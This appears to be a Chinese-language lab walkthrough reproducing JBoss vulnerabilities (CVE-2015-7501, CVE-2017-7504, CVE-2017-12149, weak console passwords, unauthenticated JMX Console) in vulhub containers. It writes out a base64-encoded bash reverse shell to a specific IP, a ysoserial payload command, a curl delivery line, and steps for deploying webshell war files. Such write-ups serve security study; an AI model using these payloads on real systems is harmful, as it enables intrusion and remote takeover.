当前位置: 首页 > article >正文

Jboss

article 2025/3/26 4:22:12

1 CVE-2015-7501

漏洞介绍

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象, 然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码

环境搭建

cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
1.POC,访问地址

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进⾏base64编码

bash -i >& /dev/tcp/114.132.92.17/6666 0>&1 YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=

java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}| {bash,-i} ">exp.ser
3.服务器设置监听得端⼝

nc -lvvp 6666

4.执⾏命令

curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

5.反弹成功

2 CVE-2017-7504

漏洞介绍

JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的
HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏ 任意代码执⾏

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
1.访问漏洞地址

python3 jexboss.py -u http://121.40.229.129:8080

3 CVE-2017-12149

漏洞简述

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
1.访问漏洞⻚⾯

2.验证是否存在漏洞 , 访问

靶场IP/invoker/readonly

该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化

返回500,说明⻚⾯存在,此⻚⾯存在反序列化漏洞

3. 使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell即可

4 Administration Console弱⼝令

漏洞描述

Administration Console管理⻚⾯存在弱⼝令,`admin:admin`,登陆后台上传war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
账户密码:admin:vulhub
1.登录后台

2.点击web应⽤

3.上传后⻔ shell.war

4.连接WebShell

5 低版本JMX Console未授权

漏洞描述

此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到 jmx控制台,并在其中执⾏任何功能

环境搭建

cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
1.访问
靶场IP/jmx-console/
2.这⾥我们使⽤得复现环境不存在,所以需要密码(正常环境⽆需密码直接可进⼊)

admin admin
3.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

4.找到⻚⾯中的void addURL() 选项远程加载war包来部署。

5.制作war包 , 这⾥⽤之前制作好的 cmd.war 填写war包远程地址
6.然后跳转以下⻚⾯

7.webshell连接

6 ⾼版本JMX Console未授权

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚⾯, 通过部署war包 , getshell

环境搭建

cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

1.本地搭建部署点

在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下

2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署
3.搭建远程部署 , 部署远程war包地址

4.然后输⼊Invoke

5.连接Webshell


http://www.kler.cn/a/597965.html

相关文章:

  • SSM社区生活超市管理
  • Powershell WSL Windows系统复制数据到ubuntu子系统系统
  • 嵌入式硬件篇---蓝牙模块
  • 群体智能优化算法-模拟退火优化算法(Simulated Annealing, SA,含Matlab源代码)
  • 【Keil5-开发技巧】
  • 华为昇腾AscendCL推理引擎入门
  • 【中文翻译】第8章-The Algorithmic Foundations of Differential Privacy
  • MCP(Model Context Protocol)好比大模型外挂!
  • 原生微信小程序基础语法--快速总结
  • (自用)在派上设置自启动时的问题
  • 第二十一章:模板与继承_《C++ Templates》notes
  • C# 反射(Reflection)详解
  • 把 ASP.NET Core 服务(BigDogServer)部署到 Linux 并作为服务运行
  • CentOS 7的下载与安装
  • Linux网络相关概念和重要知识(2)(UDP套接字编程、聊天室的实现、观察者模式)
  • FPGA学习(二)——基于DE2-115开发板的LED流水灯设计
  • 微调大模型:LoRA、PEFT、RLHF 简介
  • HTML图像
  • 如何搭建一个安全经济适用的TRS交易平台?
  • Ant Design Vue Select 选择器 全选 功能